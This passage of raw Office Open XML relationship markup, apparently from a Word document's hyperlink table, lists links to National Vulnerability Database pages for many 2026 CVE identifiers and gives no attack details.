Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66630" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66631" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78425" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80218" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82685" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25275" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50125" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50275" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50277" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50285" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53534" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54716" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63460" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68523" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68537" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81481" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81515" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81516" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85128" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85715" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85719" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85721" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85917" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86038" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86040" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87742" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92916" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92917" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92942" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92961" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92983" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93435" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93436" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24081" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25281" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25294" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50605" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50609" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50610" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78501" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81446" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86688" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90997" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92913" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25284" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53554" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54634" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66269" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76154" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80356" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81440" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52727" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54646" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54647" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81445" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81477" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81480" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81632" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92919" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92980" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15697" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44236" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52851" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54510" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54524" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54608" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66571" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86049" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86862" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90887" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90986" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91014" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92925" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92959" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93014" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45720" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93015" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54633" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61793" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78223" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89038" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92915" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92936" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93395" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81447" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85717" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86788" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91011" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92756" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92757" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25261" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44235" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52852" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54648" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54676" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54677" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66572" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66573" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66574" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66576" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66577" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66578" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66579" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66617" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67071" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77281" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78294" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81453" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81868" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85078" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90923" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92912" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66608" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81443" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86311" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86522" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92880" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92993" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93394" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54521" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54644" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55946" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53556" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54582" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54585" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54586" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86861" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75523" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85718" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85720" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50022" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54575" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54576" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54587" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81479" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92933" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44940" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92758" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50291" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76781" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92926" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14311" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54613" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54643" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73999" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74005" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80355" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16582" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16750" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54355" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54594" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54604" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54642" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54907" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54918" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63461" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66575" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66676" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71568" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74000" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74002" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74017" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78296" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78528" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81829" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85999" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86000" TargetMode="External" Id="rId329" /><Relationship 